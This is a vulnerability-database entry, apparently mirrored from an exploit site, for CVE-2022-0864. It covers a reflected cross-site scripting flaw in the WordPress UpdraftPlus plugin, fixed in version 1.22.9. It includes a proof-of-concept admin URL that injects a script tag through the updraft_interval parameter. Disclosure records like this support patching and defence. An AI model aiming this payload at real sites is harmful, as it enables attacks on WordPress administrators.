Lucene search
Taurus Omar1337DAY-ID-37600HistoryApr 07, 2022 - 12:00 a.m.
WordPress UpdraftPlus Plugin < 1.22.9 - Reflected Cross-Site Scripting Vulnerability
2022-04-0700:00:00
Taurus Omar
0day.today
213
0.002 Low
EPSS
Percentile
64.5%
Tittle:
WordPress Plugin UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting
References:
CVE-2022-0864
Author:
Taurus Omar
Description:
The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
Affects Plugins:
Updraftplus - Fixed in version 1.22.9
Proof of Concept:
https://example.com//wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(1)</script>
Classification
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872
Related
openvas
openvas
WordPress UpdraftPlus Backup Plugin < 1.22.9 XSS Vulnerability
2022-04-07 00:00:00
packetstorm
packetstorm
WordPress UpdraftPlus Cross Site Scripting
2022-04-07 00:00:00
wpexploit
wpexploit
UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting
2022-03-10 00:00:00
nuclei
nuclei
UpdraftPlus < 1.22.9 - Cross-Site Scripting
2023-04-04 02:23:02
cvelist
cvelist
CVE-2022-0864 UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting
2022-04-04 15:35:53
patchstack
patchstack
cve
cve
CVE-2022-0864
2022-04-04 16:15:09
wpvulndb
wpvulndb
UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting
2022-03-10 00:00:00
prion
prion
Cross site scripting
2022-04-04 16:15:00
nvd
nvd
CVE-2022-0864
2022-04-04 16:15:09